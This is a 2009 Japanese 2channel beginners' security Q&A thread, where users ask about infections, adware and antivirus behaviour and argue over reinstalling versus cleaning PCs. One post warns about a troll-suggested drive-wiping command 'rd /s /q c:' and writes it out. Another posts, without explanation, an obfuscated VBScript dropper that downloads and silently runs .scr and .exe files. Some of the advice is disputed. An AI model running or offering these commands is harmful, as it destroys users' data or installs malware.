セキュリティ初心者質問スレッドpart118
at SEC
1:八頭 ◆YAGApwSaEw
09/07/04 05:50:45
初心者の方の為のインターネットとパソコンのセキュリティについての質問スレッドです
自習を出来るリンクを紹介していますのでご参考にして下さい
━ 質問マナー ━━━━━━━━━━━━━━━━━━
・ アドバイスをもらう為に、「質問用テンプレート」を使って質問しましょう
・ 2回目以降の発言書込は、名前欄に「最初に質問した番号」を半角英数字で入力して下さい
・ 他から誘導されて来た場合は、その旨書いておきましょう
・ アドバイスする方も、解りやすい説明をしてあげて下さい
・ ここは2ちゃんねるですので、正しい解答ばかりとは限りません (用心しましょう)
━ 質問用テンプレート ━━━━━━━━━━━━━━━━━
【使用OS】 『』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: GHz 、メモリ: MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『』 例、Firefox 3
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】 『』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『』
【回線の種類・ルータの有無】 『』 例、光回線でルータ使用中
【具体的な症状】 『』
【過程と措置】 『』
【その他】 『』
【スクリーンショット画像やテキストファイルをアップロード出来るサイト】
↓ ※先頭のhを抜いてこっちへリンクして下さい
ImageHost.org
URLリンク(www.imagehost.org) (Hotlink のURLを http://××.jpg )
2:名無しさん@お腹いっぱい。
09/07/04 05:53:16
●Microsoft セキュリティ TechCenter
URLリンク(technet.microsoft.com)
●マイクロソフト セキュリティ At Home - 個人情報の盗難、スパイウェア、ウイルスを防ぐ
URLリンク(www.microsoft.com)
●Microsoft Update
URLリンク(update.microsoft.com)
●答えてねっと (*マイクロソフトが運営するパソコンに関するQ&Aサイト) ※2009年7月末で終了予定
2009年夏に公開予定の情報交換フォーラム「Microsoft Answers」日本語版開設
URLリンク(www.kotaete-net.net)
◆Windows を Conficker ワームから守る情報
URLリンク(technet.microsoft.com)
●JVN iPedia -脆弱性対策情報データベース (*最新版への更新を)
URLリンク(jvn.jp)
「脆弱性」とは、ソフトウエア製品やウェブアプリケーション等におけるセキュリティ上の問題箇所(ウィークポイント)です
使用しているソフトウェアやWebプラグイン類の最新版Updateとセキュリティ設定を常に心掛けましょう
(*動画Player、圧縮解凍ソフト、Adobe関連、Office系ソフト、Mailソフト、Sun MicrosystemsのJavaなど)
●IPA 「外部記憶メディアのセキュリティ対策を再確認しよう!」 ― USB メモリ、便利のウラに落とし穴 ―
URLリンク(www.ipa.go.jp)
●IPA「 USB メモリのセキュリティ対策を意識していますか? 」 ― USB メモリの安全な使い方を知ろう ―
URLリンク(www.ipa.go.jp)
●(財)日本データ通信協会 - 迷惑メール相談センター
URLリンク(www.dekyo.or.jp)
3:名無しさん@お腹いっぱい。
09/07/04 05:54:05
●OCN : あんしんWeb - How To セキュリティ
URLリンク(secure.blog.ocn.ne.jp)
●ベネッセ ジュニアパーク - 子どもとインターネット (保護者の方へ)
インターネットや携帯電話が身近になるとともに、子どもを巻き込んだ事件や犯罪が増加しています
URLリンク(j.benesse.ne.jp)
★4月1日より、青少年ネット規制法が施行--18歳未満にフィルタリングサービスなどを義務づけ
URLリンク(japan.cnet.com)
●セキュアブレイン - ワンクリック詐欺とは
URLリンク(www.securebrain.co.jp)
●セキュアブレイン gred - News Clipping
URLリンク(www.gred.jp)
●INTERNET Watch
URLリンク(internet.watch.impress.co.jp)
●YOMIURI ONLINE(読売新聞) - セキュリティー (サイバー護身術)
URLリンク(www.yomiuri.co.jp)
●PC Online - セキュリティ
URLリンク(pc.nikkeibp.co.jp)
●ITpro : セキュリティ- Webの脅威 (最新の脅威の解説と対策術)
URLリンク(itpro.nikkeibp.co.jp)
●IT-PLUS - セキュリティー連載コラム ネット危険地帯
URLリンク(it.nikkei.co.jp)
●Japan.internet.com - スパイウェアによって何が起こるか?
URLリンク(japan.internet.com)
4:名無しさん@お腹いっぱい。
09/07/04 05:55:04
●IT用語辞典 e-Words
URLリンク(e-words.jp)
●IT用語辞典 BINARY
URLリンク(www.sophia-it.com)
●gred (国産サイト安全性チェックサービス - ウイルス ,ワンクリック詐欺 ,Web攻撃の有無など)
URLリンク(www.gred.jp)
●Online Link Scan (4種類のサイト安全性チェックを一度に PhisTank ,AVG ,SiteTruth ,Google Safe Browsing)
URLリンク(onlinelinkscan.com)
●Norton Safe Web (is this site safe? )
URLリンク(safeweb.norton.com)
マイコミジャーナル
米Symantec、サイトの安全性を技術と評判で検証「Norton Safe Web」
URLリンク(journal.mycom.co.jp)
●ソースチェッカーオンライン (ラクラリンクチェック)
URLリンク(so.7walker.net)
●飛び先のチェック (ブラクラリンクチェック)
URLリンク(www.ultimo.to)
5:名無しさん@お腹いっぱい。
09/07/04 05:56:21
●higaitaisaku.com (スパイウェア、ウイルスなどマルウェア関連のトピックス のページ)
URLリンク(www.higaitaisaku.com)
*PCトラブル質問掲示板 (ウイルスによるトラブルに見舞われている方の解決掲示板)
URLリンク(bbs.higaitaisaku.com)
*PC健康診断掲示板 (特にPCに問題は感じないが念のためチェックしてほしい方向けの診察掲示板)
URLリンク(medcheck.higaitaisaku.com)
(相談方法)
「新規作成」をクリック → 次のステップへ「NEXT」をクリック → HijackThisログとアンインストール情報ログの取得(テキスト出力)
「新規相談ツリー」作成して、ログテキストの内容をコピー&貼り付けして相談開始
URLリンク(www.higaitaisaku.com)
●Securityzone (Security のページ)
URLリンク(securityzone.zapto.org)
●ウイルス対策ソフト情報 (検出力テスト結果 の解説)
URLリンク(blog.fideli.com)
●[ 便利 ] 2ch専用ブラウザ [ 推奨 ] 2ちゃんねるブラウザ - Wikipedia
Wikipedia項目リンク
●2ちゃんねるガイド:目次
URLリンク(info.2ch.net)
●2ちゃんねる 初心者が安心して質問できるスレッドガイダンス
2ちゃんねるには様々な有益な情報とともに、有害な「ワナ」をしかけていることがあります
URLリンク(ansitu.xrea.jp)
6:名無しさん@お腹いっぱい。
09/07/04 05:57:04
●IPA情報処理推進機構 (情報セキュリティのページ)
URLリンク(www.ipa.go.jp)
●IPA情報処理推進機構 (基本的なセキュリティ対策実践情報のページ)
URLリンク(www.ipa.go.jp)
●IPA情報処理推進機構 (情報セキュリティに関する届出)
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置
URLリンク(www.ipa.go.jp)
●内閣官房 インターネット上の違法・有害情報対策 (違法・有害情報対策のポータルサイト)
URLリンク(www.it-anshin.go.jp)
●内閣官房情報セキュリティセンター
URLリンク(www.nisc.go.jp)
●警察庁 (国の行政機関)
URLリンク(www.npa.go.jp)
●@police (*警察庁 セキュリティポータルサイト )
URLリンク(www.cyberpolice.go.jp)
●警察庁 サイバー犯罪対策
URLリンク(www.npa.go.jp)
●警視庁 (=東京都警察) ハイテク対策 情報セキュリティ広場
URLリンク(www.keishicho.metro.tokyo.jp)
●STOP!架空請求! (東京都 架空請求緊急対策班による通報受付 )
URLリンク(www.anzen.metro.tokyo.jp)
7:○最近のセキュリティニュース ピックアップ
09/07/04 05:58:12
「漫画・イラストも児童ポルノ規制対象に」約9割─内閣府調査 2007/10/25
ネット上の「有害情報」を規制すべきという回答も約9割に上った
URLリンク(www.itmedia.co.jp)
個人情報を盗むフィッシング・スパイウェアの巧妙化 - 愉快犯から金銭目的の犯罪者へ 2008/10/24
だまされないためには包括的なセキュリティ意識の向上が必須
URLリンク(www.cyberpolice.go.jp)
オークション詐欺にひっかからないように、犯人の手口を頭に入れておきたい 2009/02/20
URLリンク(www.yomiuri.co.jp)
「USBメモリーを安全に使おう」、自動実行の無効化をIPAが呼びかけ 2009/05/07
URLリンク(itpro.nikkeibp.co.jp)
YouTube動画のコメントにマルウエアへのリンク,自動化ツールで急増か 2009/05/25
「YouTube」に投稿された動画のうち,最大で約4900本のコメント欄に,悪意あるWebページへのリンク
URLリンク(itpro.nikkeibp.co.jp)
楽天市場から個人情報がスパム業者に流出か 2009/05/27
実名の記載された迷惑メールが楽天でしか使っていないメールアドレスに届き始める
URLリンク(news.livedoor.com)
PC 初心者の3割が「バックアップ全くしてない」 2009/6/25
URLリンク(japan.internet.com)
稼働中の Adobe 製品の多くは既存パッチが未適用 2009/07/02
広く普及している Adobe Systems 製品が最たるものだと警告した
URLリンク(japan.internet.com)
8:名無しさん@お腹いっぱい。
09/07/04 05:59:42
●【※要注意】 そそのかされて、この手順を行うとドライブのデータが全て消えてしまいますよ××
━注意━━━━━━━━━━━━━━━
チェックディスクコマンドを試してみろ (リフレッシュコマンドを試してみろ とか・・・)
cmd /c rd /s /q c:
と入力し[OK]
上記と同様に以下も
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
━━━━━━━━━━━━━━━━
●テンプレここまで (*セキュリティ初心者向け情報募集中)
9:名無しさん@お腹いっぱい。
09/07/04 13:52:14
>>1
乙
10:名無しさん@お腹いっぱい。
09/07/04 14:17:29
【使用OS】 『XP SP2』
【PCスペック】 『CPU: 2.80GHz 、メモリ: 224MB』
【使用ブラウザ】 『Firefox 3.5』
【Microsoft Updateの更新の状態】 『自動更新は停止状態』
【セキュリティソフトと年式】 『avast! 4.8 Home Edition』
【その他スパイウェア対策ソフト】 『Spybot Search』
【回線の種類・ルータの有無】 『光回線でルータ使用中』
【具体的な症状】 『数分ごとにネガポジ反転したような少女の画像が作業中のウィンドウに出現』
【過程と措置】 『再起動しても復活。win,iniには該当らしき記述なし。madoka、ozawa、hikaru、jenifferなどは検出せず。』
【その他】 『どこかのアップローダーから「ディアボロの大冒険 ver 13.0 .zip」
というファイルを開いて中身のexeを起動してから感染したと思われます。』
11:名無しさん@お腹いっぱい。
09/07/04 14:53:28
>>10
なぜ古いスレから使わない
死ね死にさらせ
12:八頭 ◆YAGApwSaEw
09/07/04 14:55:51
>>10
その圧縮ファイルを再取得
avast!
URLリンク(www.avast.com)
の最下からMail添付ファイルでパスワードを『virus』にして検体送信→ワクチン化を待つ
その後で、VirusTotalの解析にかけてなんなのか?を自己確認(DLした圧縮ファイルのままでOK)
URLリンク(www.virustotal.com)
オートラン無効設定を実施していないならやって→PC再起動しておくこと
「 USB メモリのセキュリティ対策を意識していますか? 」 ― USB メモリの安全な使い方を知ろう ―
URLリンク(www.ipa.go.jp)
とりあえずここまで
13:名無しさん@お腹いっぱい。
09/07/04 14:59:38
>>12
また誤回答かよ
14:名無しさん@お腹いっぱい。
09/07/04 16:14:07
もうテンプレに入れようぜ。
八頭 ◆YAGApwSaEw は信用できない投稿者です。
15:10
09/07/04 17:54:56
>>11
すみません
次回から気をつけます
>>12
迅速な回答ありがとうございます
そのようにします
16:名無しさん@お腹いっぱい。
09/07/04 18:06:54
>>15
1.もう1回ダウンロードして検体提出は問題無い
2.ワクチン化されるのを待つのは大きな間違い。検出できるようにはなるかもしれませんが
ワクチン(除去と設定等復元)は作成されません。あくまでも本体のブロック、削除であり、
本体が変更を加えたWindowsのレジストリなどを正常に復帰させることはできません。
3.セキュリティソフトの対応を待つ間、該当PCは無防備かつ危険な状態に置かれます。
必要なデータが破壊される可能性もありますので、放置して待つような対応は厳禁です。
4.どんなマルウェアであれ、感染した場合は、PCリカバリまたはOS再インストールで復帰させるのが鉄則です。
PCリカバリ(またはOS再インストール)以外の方法では、削除できたと思っても、別の何かが残ってしまう危険を
犯してしまうと、BOTネットに組込まれたり、なんらかの中継に利用されたり、自分の個人情報や、流出させては
いけない情報が流出してしまうなどの危険があります。意図せぬ加害者になってしまうことのないように、早急に
PCリカバリ(OS再インストール)を行なってください。
今後、八頭の言うことは信じちゃダメです。2割り程度はまともなことも混じってるかも知れませんが、
全体としては有害です。
17:八頭 ◆YAGApwSaEw
09/07/04 18:31:36
>>10
>>12まで出来たら
スレリンク(sec板:13番) の
「a-squared Free 4.5」〜「Live OneCare PC セーフティ (オンラインスキャン)」までの4つを順番に試して、
他にも検出があれば一応報告して下さい。
>>16
その理屈だと世界中から駆除フォーラムが消えてなくなるよ(笑)
18:名無しさん@お腹いっぱい。
09/07/04 19:54:11
>八頭 ◆YAGApwSaEw
有害だからお前はもう黙れ。
19:名無しさん@お腹いっぱい。
09/07/04 20:14:32
ポートスキャンって言うので自分のマシーンに潜入されたら2ちゃんの恥ずかしい書き込み
とかもばれるんですかね?
そういうのってアンチウィルスではガードできないんですか?
普通の家でもルータとかが必要ですか?
20:名無しさん@お腹いっぱい。
09/07/04 20:52:14
>>19
ばれる事は無いと思う。ただ昨今のセキュリティー事情では
ルータ+PFWは必須で、ルータを導入するとルータのWAN側
インターフェイスにグローバルIPアドレスが割り振られる。
つまりWAN側から直にアクセスできるのはルータまでとなり
それより内側にあるPCには直にアクセス出来無い。
PFWのみでも意図的にポートを開放してなければ大丈夫だけど
ハード処理とソフトウエア処理を比較した場合は
ハード処理の方が手堅い。
21:名無しさん@お腹いっぱい。
09/07/04 21:07:10
>>20
ありがとうございます
買いますルータ
22:名無しさん@お腹いっぱい。
09/07/04 21:10:00
>>10
感染した=悪意のあるプログラムが取り憑いた
取り憑いた場所、部位にもよるし、書換が行われた場合などでも違ってくる。
無意味なDLLやファイルが残る可能性もあるし…
通常は元に戻そう何て考えない方がいい。アンチウイルスソフトは水際対策だから
感染した場合は素直にインストールし直す事をすすめる。
そのために日頃のバックアップとかが重要になってくる訳で、アンチウイルスソフトも
感染しないようにするためのプログラムと考えて感染後の駆除などは期待しないほうがいい。
23:名無しさん@お腹いっぱい。
09/07/05 08:58:11
【使用OS】 『XP SP3』
【PCスペック】 『CPU: 2.80GHz 、メモリ: 1G』
【使用ブラウザ】 『Firefox 3.011』
【Microsoft Updateの更新の状態】 『自動更新は停止状態』
【セキュリティソフトと年式】 『avast! 4.8 Home Edition』
【その他スパイウェア対策ソフト】 『Spybot Search』『Ad-Aware』『SpywareBlaster』
【回線の種類・ルータの有無】 『光回線でルータ使用中』
【具体的な症状】 『今のところ特になし?』
【過程と措置】 『Spybot→Ad-Aware→トレンドマイクロのオンラインスキャンでは何も発見しないものの
最後にスキャンしたavastのブートタイム検査 でWin32:Adware-gen [Adw]を発見
場所はc:\program files\ntte-rt\toolbar\flets.dll
とりあえずチェストに移動』
これは削除しても大丈夫ですかね?
24:名無しさん@お腹いっぱい。
09/07/05 10:08:06
>>23
フレッツ・スクウェアツールバーを使うなら戻す。
使わないなら、戻してツールバーを削除。
名称からわかるように「アドウェア」ですので、残すか消すかは自己責任で判断してください。
25:名無しさん@お腹いっぱい。
09/07/05 10:25:43
"アンチウイルス"による駆除は期待できなくても何らかの方法でマルウェアを
取り除く方法はある。あのカスペルスキーもそう言ってたし
そもそも駆除出来ないレベルで改変されてたらパソコン不安定になりまくりだろ。
八頭のなんちゃって駆除も酷いが
26:名無しさん@お腹いっぱい。
09/07/05 11:30:31
>>25
自分で端末を見て、判断できるなら処理すればいいさ。
回線の向こう側の、しかも初心者のPCのメンテなんてできっこない。
PCリカバリ以外の方法を勧めて、なんらかの危険を残してしまうよりいいんでないか?
27:名無しさん@お腹いっぱい。
09/07/05 13:05:22
>>24
どうも。
使わないので削除することにします。
ありがとうございました。
28:名無しさん@お腹いっぱい。
09/07/05 15:19:48
( ゚Д゚)ウマー
29:名無しさん@お腹いっぱい。
09/07/05 17:33:18
【使用OS】 『XP sp2』
【PCスペック】 『CPU: 3.16GHz 、メモリ: 3250MB』
【使用ブラウザ】 『IE』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『avast』
【その他スパイウェア対策ソフト】 『spybot S&D』
【回線の種類・ルータの有無】 『光回線でルータ使用中』
【具体的な症状】 『ashServ.exeが十分おきぐらいに作動してCPUの30%ぐらいを食ってしまいます。
それだけならいいのですが、なぜか作動中はインターネットの通信が全て遮断されてしまい、
ネット関連の作業は何も出来なくなります。』
【過程と措置】 『一度、avastを消して再インストールを試みましたが、特に変化なし。
ashServ.exeはタスクマネージャからの強制終了も受け付けません。』
30:八頭 ◆YAGApwSaEw
09/07/05 17:42:03
>>29
C:\Program Files\Alwil Software\Avast4\ashServ.exe
avastスレの1に相談だな
31:名無しさん@お腹いっぱい。
09/07/05 18:10:38
>>29
URLリンク(www23.atwiki.jp)
>Q.ウイルス発見時に馬鹿みたいに重くなる(CPUリソースを使い切る)のがウザイ
>A.ashServ.exeのプロセス優先度を下げれば若干緩和される。オートギア(フリーソフト)でashServ.exeを
>優先度"低"で登録しスタートアップに入れると楽。
>オートギア(Windows95/98/Me / ユーティリティ)
>URLリンク(www.vector.co.jp)
>
>しかしこの手法でも、最近のバージョンアップにより、ウイルス発見時(特にアーカイブ内を検査する時)は
>高負荷になっているようである。
Avastは、ファイル書き込みが発生した時や、パターン更新時にCPUを占有して、他のタスクが止まることがあります。
根本的な解決には、デュアルコア以上のCPUにするしかありません。
シングルコアCPUで耐えきれないと感じた場合は、AVGやAntiVirなどの他のセキュリティソフトへの乗り換えを
検討した方が幸せになれると思います。
32:名無しさん@お腹いっぱい。
09/07/05 18:14:15
>>30
>>14,>>18
33:名無しさん@お腹いっぱい。
09/07/05 18:27:23
>>31
流石だな。回答のスキルが違うwww誰とは言わないが
34:八頭 ◆YAGApwSaEw
09/07/05 18:28:20
自演ウザいなw
35:名無しさん@お腹いっぱい。
09/07/05 18:32:17
アバストスレで荒らせなくなった中国人だろw
36:名無しさん@お腹いっぱい。
09/07/05 18:45:12
都合が悪くなると直ぐに自演扱いか?www
>>20の回答は俺だけど>>31は俺では無い
37:名無しさん@お腹いっぱい。
09/07/05 18:47:59
だから自演するなってw
38:29
09/07/05 19:05:39
取り敢えず、そのオートギアってのを使ってみます。
でも通信が遮断されるのは何でだろ?
39:名無しさん@お腹いっぱい。
09/07/05 19:14:14
オートギア昔使ったことあるけど
優先度の操作はかえってシステム全体が不安定になるよ
40:名無しさん@お腹いっぱい。
09/07/05 19:18:11
>>25
22です
老婆心ながら、例えばウイルスを作成する場合に、アンチウイルスをすり抜けさせるために
取り憑くプログラムの注入部位をいろいろ変化させたりしていますが、アンチウイルスが
駆除するときはその注入された部位全てを取り除く訳ではなく、機能しなくなる範囲での抹消です。
プログラム自体は少し位中身を変更しても動くもので、(実際にプログラムが動いて次に
CALLする場所周辺を消してコンパイルしても普通に動くものです)
よく見かけるのは「駆除前にバックアップし、駆除したことを確認してからバックアップを削除」
ですが、元通りにできるのであれば必要ない訳ですよね。
アンチウイルス全体をみれば分かりますが、検出精度を主体にしていて駆除率を掲げてはいません。
悪意のあるプログラムに因っては変化するアルゴリズムを持ち、読み込まれると変異して自ら変化し
ながら動き回るものもあり、駆除が難しいことは各ベンダーも十分分かっていると思います。
駆除といっても本来のウイルスの動作を封じるだけの場合もあり、完全に取り除くことが難しい
ウイルスも存在していることは周知の事実であり、F-Secure でも
"ウイルスの感染部位や感染の状況によっては、正しく駆除されない場合があり"
となっています。
セキュリティ初心者質問スレッドなので… 変に対処しないでリカバリを勧めたいです。
長文にて失礼
41:名無しさん@お腹いっぱい。
09/07/05 19:27:07
AV-TESTによるウイルス検出率テスト(2009年6月23日実施、検体数758,547)
URLリンク(antivirus-news.net)
順位 プログラム 検出数 検出率
#1 G Data 2009 757052 99.80% (AVAST!+BitDefender+独自検出 )
#2 Symantec 755146 99.55%
#3 F-Secure 2009 735273 96.93% (5つのマルウェア検出エンジンを搭載 )
#4 McAfee 732570 96.58%
#5 Kaspersky 731730 96.46%
#6 Microsoft 729229 96.13%
#7 Trend Micro 726146 95.73% (ウイルスバスター )
#8 Eset Nod32 718122 94.67%
#9 K7 Computing 668839 88.17% (ソースネクスト ウイルスセキュリティZERO )
#10 Rising 587824 77.49% (瑞星 ウイルスキラー )
*本データは、ウイルス対策ニュース・ドットネットがAV-TESTから入手し発表しているもの。テスト日は6月23日。
*AV−TESTは、ドイツのマグデブルク大学にある、ウイルス検出率をテスト評価する第三者機関。主宰は、アンドレアス・マークス。
*アジア=パシフィック地域、特に日本、台湾、中国において頻発しているウイルスを中心に採集されており、
検体は6ヶ月以内に発生したものに限定されている。今月のテストのサンプル758,547種が使われた。
*テストの対象は、国内で市販されている主要ウイルス対策ソフト(無料製品は除く)。
*ここでいう「ウイルス」とは、「狭義のウイルス」に加えて「ワーム」「トロイの木馬」「ボット」「バックドア」を含む
42:八頭 ◆YAGApwSaEw
09/07/05 19:33:42
>>40
リカバリだとC:ドライブは綺麗になるだろうけども
別のドライブにリスクの種が残っている場合は再感染の可能性が充分あるから
感染の種類くらいは特定すべきじゃないかな
43:名無しさん@お腹いっぱい。
09/07/05 20:22:49
>>42
基本的な対応は、PCリカバリして、WindowsUpdateを全て当てた後で、セキュリティソフトを導入してパターンを最新にする。
それから、他のドライブからデータの復旧なりアプリケーションの導入なりをして環境を整える。
この手順を守る限りにおいては、別ドライブに残っているかもしれないものについては、セキュリティソフトがブロック可能です。
ですから、>42のような心配は不要です。かえって、感染状態でいる時間を延ばすことになるので有害です。
また、このスレに相談しにくるようなPC初心者さんが、複数ドライブを使っていたり、別ドライブにデータを分けたり
するような使い方をしている可能性はあんまりないと思います。(相談時の環境で、別ドライブの存在がわかった時だけ
セキュリティソフトの更新が終わるまではそのドライブにアクセスしないように注意してあげれば十分でしょう)
やっぱり、お前さんは、このスレには有害だと思う。
>>42
>>14,>>18
44:名無しさん@お腹いっぱい。
09/07/05 20:27:17
WindowsUpdateやアンチウィルスソフトの更新をする間に
感染する可能性もあるんですよね?
45:名無しさん@お腹いっぱい。
09/07/05 20:28:43
フリーのアンチウィルスソフトをダウンロードするときは無防備でも
そのあとスキャンすれば大丈夫なんですか?
46:名無しさん@お腹いっぱい。
09/07/05 20:39:00
ツールバーにMIRARって出て消せねぇ〜。ちなみにソフトはノートンアンチウイルス2009入れてるんだがウイルス検出されねぇ〜
47:名無しさん@お腹いっぱい。
09/07/05 20:48:21
(ο^д^)ノシ
48:八頭 ◆YAGApwSaEw
09/07/05 21:01:44
>>43
>この手順を守る限りにおいては、別ドライブに残っているかもしれないものについては、セキュリティソフトがブロック可能です
>セキュリティソフトの更新が終わるまではそのドライブにアクセスしないように注意してあげれば十分でしょう)
それはあなたがそう思い込んでるだけであって、
たった1枚のエロ画像からでも実際には再感染は起こり得ます
解析結果の画像→ URLリンク(h.imagehost.org) (ありふれた拡張子.Jpegですがリスクの種です)
ですから、もし物理フォーマットで完全解決を薦める場合には、
他のドライブに残るリスクの種(ネットでの取得物など)までも捨て去る様に言わなくてはなりません
これが僕の完全駆除の『基本』です
>PC初心者さんが、複数ドライブを使っていたり、別ドライブにデータを分けたりするような使い方をしている可能性はあんまりないと思います。
失礼ながら、あなたがPC音痴なだけであって
価格.comで、よく売れているPCのGZ-X1BPD-100 は、
ATX/MicroATX でありますが、3.5インチベイ:2個 3.5インチシャドウベイ:5個 5.25インチベイ:4個 です
店頭で根強い人気のPCケースのANTEC SOLO BLACK は、
ATXで、3.5インチベイ:2個 3.5インチシャドウベイ:3個 5.25インチベイ:4個 です
わかりまちたか?
49: ◆N9P3SuvBPo
09/07/05 21:20:39
>43
>このスレに相談しにくるようなPC初心者さんが、複数ドライブを使っていたり
確かに。
複数と言ってもCドライブとDドライブだけしかないもんな。
デフォでは
本当に不安なら、データを諦めてもらうってのもアリかもしれませんね。
てか>>48おおおおおおおおいw
JPEG.EXEって画像じゃありません。
アイコンは画像のアイコンに偽装されてると思われますが。
肝心な検出結果もモザイク入れて隠して…
どんなスキルのある人でも、分からないだろう…。
50: ◆N9P3SuvBPo
09/07/05 21:22:08
補足
>48のURLはVirustotalの結果画像ですが、ソースチェッカーを使って確認し、
各自自己責任にてアクセスしてください
51:名無しさん@お腹いっぱい。
09/07/05 21:23:48
>>48
やっぱ、お前いらんわ…。
52:名無しさん@お腹いっぱい。
09/07/05 21:25:41
set v2qf1 = d6d4fd.CreateObject(f2eje0,"")
set ste5mp = v2f7e.GetSpecialFolder(2)
n5sc6.type = 1
t4get="GET"
v4x5i.Open t4get, aurl_0, False
v4x5i.Send
y1L_wy80= "L_wy80.scr"
y1L_wy80= v2f7e.BuildPath(ste5mp,y1L_wy80)
n5sc6.open
n5sc6.write v4x5i.responseBody
n5sc6.savetofile y1L_wy80,2
n5sc6.close
v2qf1.ShellExecute y1L_wy80,"","","open",0
v4x5i.Open t4get, aurl_1, False
v4x5i.Send
y1L_wy81= "L_wy81.exe"
y1L_wy81= v2f7e.BuildPath(ste5mp,y1L_wy81)
n5sc6.open
n5sc6.write v4x5i.responseBody
n5sc6.savetofile y1L_wy81,2
n5sc6.close
v2qf1.ShellExecute y1L_wy81,"","","open",0
53:名無しさん@お腹いっぱい。
09/07/05 21:26:29
>>46
BHOに登録されたのでしょう。
ブラウザの「アドオンの管理」にMIRARってのがあると思う。
ググったらセーフモードでspybotを使用すれば削除できる報告があった。
>>??
最初の回答ではベンダーからの回答待ち、ウイルストータルでの確認、自動実行の無効化っだたような
即リカバリしないのに、マルウエアの自動起動の無効化さえ指示してない方が完全駆除と言われる。
>>50
( ´(ェ)`)ノシ
54:八頭 ◆YAGApwSaEw
09/07/05 21:29:50
>>N9P3SuvBPo
48は僕が撮ったスクリーンショットだから安全だよw
ボカシ入れてるだろ
55: ◆N9P3SuvBPo
09/07/05 21:34:08
>53
φ(^。^)ノシ
56:名無しさん@お腹いっぱい。
09/07/05 21:45:18
八頭 ◆YAGApwSaEw
真土けクズ
57:名無しさん@お腹いっぱい。
09/07/05 21:48:59
すいません、質問です
自作pc手がけてみようと価格.comでパーツを見比べていて
antecのP183というpcケース紹介ページから(URLリンク(kakaku.com))
メーカーサイトへ飛んだんですが、なにかひどい文字化けで。。
パソコンに不調が起きたとかは無いんですが
アメリカでwebサイト改竄が〜とか言っていたのを思い出して不安になってます
58:八頭 ◆YAGApwSaEw
09/07/05 21:57:23
>>57
ブラウザのツールバー>表示>エンコード>西ヨーロッパ言語 で文字化け直らない?
CoolerMasterのPCケースも最近いいのがあるね
59: ◆N9P3SuvBPo
09/07/05 22:00:25
>57
行って来たけど、文字化けはしてませんでしたけど…
再度アクセスしても文字化けしてるようでしたら、
ページ内を右クリック→エンコード→日本語をクリックしてみて。
webサイト改ざんとか言っても、OSやブラウザやアプリ、対策ソフト類を最新にしてれば、
よほどのことがない限り感染はしませんので安心してください。
ちなみに、エンコード>西ヨーロッパ言語をしたら、俺の環境では文字化けしました。
60:名無しさん@お腹いっぱい。
09/07/05 22:05:06
俺の環境だとIE8でもChromeでも文字化けするわ。
右下の「Global Home」から国を選ぶと正常に表示できる。
61:八頭 ◆YAGApwSaEw
09/07/05 22:14:16
日本サイトだったか・・・
ちなみに
こっちがANTEC P183 スペック ページだから
URLリンク(kakaku.com)
62:名無しさん@お腹いっぱい。
09/07/05 22:39:08
ありがとうございます
>>60氏と同じような感じですね
一応、(無関係だろうけど)GENOウイルス対策はしてあるつもりです
文字化けの出だしがahoなのが何ともでした…
63:名無しさん@お腹いっぱい。
09/07/06 04:43:30
ちなみに右クリック→エンコード→日本語でも文字化けする
64:名無しさん@お腹いっぱい。
09/07/07 04:08:32
自作のキューブ型PC使ってますが後ろのファンは別に無くても大丈夫ですか?
65:名無しさん@お腹いっぱい。
09/07/07 12:01:41
失礼します。パソコン一般総合質問板より誘導されてきました。
【使用OS】 XP Home SP3
【PCスペック】 CPU:Intel Core2 CPU6300 1.86GHz メモリ: 2GB RAM
【使用ブラウザ】 IE・Sleipnir
【Microsoft Updateの更新の状態】 自動更新設定
【セキュリティソフトと年式】 Avast 2009
【その他スパイウェア対策ソフト】 Ad-Aware
【回線の種類・ルータの有無】 光回線でルータ使用中
【具体的な症状】 先日Windowsの自動更新後から、HTMLが全て正常に開けなくなりました。
IEやHTMLファイルを開こうとすると、このファイルを開くか保存しますか?という今まで出なかったダイアログが出て
開くを選択しても開けまぜん。その他の形式(mp3やtxtなど)ファイルは問題なく開けます。
検索エンジン等で調べようにもIEが開けない為、2ちゃんブラウザが正常に動いたのでこちらで質問した次第です。
【過程と措置】
システムの復元をしようとしたんですが、システムの復元というウインドウが出るものの真っ白の状態でそこから何も表示されず
復元出来ませんでした。
【その他】
件の自動更新後ですが、再起動後に右下のタスクトレイに「悪意あるマルウェアを削除しました」と表示され、クリックしたところ、ファイル名がWin32〜から始まるものが数十個表示され
そのうちの一つが削除されたという表示がされました。思わずその画面は消してしまったので詳しい内容をおぼえていません。
その後SleipnirやIEを使おうとして今の症状に至ります。
あと、Avastを疑って一度起動してみたんですが、今まで起動できていたのに「Win32モードでは起動できません」と表示され起動できません。
前述の削除されたマルウェアのファイル名にもWin32とありましたが、Win32がなんなのかわからず、検索も出来ない状態なので2ちゃんねるに書き込むことにした次第です。
長文で申し訳ありませんが、ご指導お願いいたします。また、板違いでありましたら誘導していただけたらと思います。
66:名無しさん@お腹いっぱい。
09/07/07 12:02:01
ZoneAlarmのフリーの日本語版が1年も更新されないので移行を考えてます。
Comodoファイアーウォールはよく散見されるように、そんなに設定が難かしいのでしょうか?
67:名無しさん@お腹いっぱい。
09/07/07 12:37:27
>>65
ウイルスなどでおかしくなった環境は、フォーマットしてOSから全部
再インストール(リカバリー)するのが一番確実かつウダウダ悩むより
早い訳だが、それはどうしてもやりたくないのか?
>>66
Comodo Firewall @ Wikiなどの説明の多さを見ただけで敬遠する人も
多いんだろうなw
理解して設定した方が良いのは当然だが、最初は解説サイトの設定例を
丸写しでもすればそんなに面倒臭くもない。
68:名無しさん@お腹いっぱい。
09/07/07 12:59:46
>>65
PCリカバリ。メーカー製でない場合はOS再インストール。
69:65
09/07/07 14:00:05
>>67-68
ご回答ありがとうございます。やはり再インストールですか。
リカバリしたくないというわけではないのですが、自動更新後おかしくなったということで
ウイルスではなく、Windowsアップデートによる何かの不具合なのかなと思ったもので。
HTMLが開けない以外は正常ぽいので、リカバリせずにいけるならそちらの方がいいと思った次第です。
ピンポイントでIEが起動できなくなるウイルスというのがあるのでしょうか?
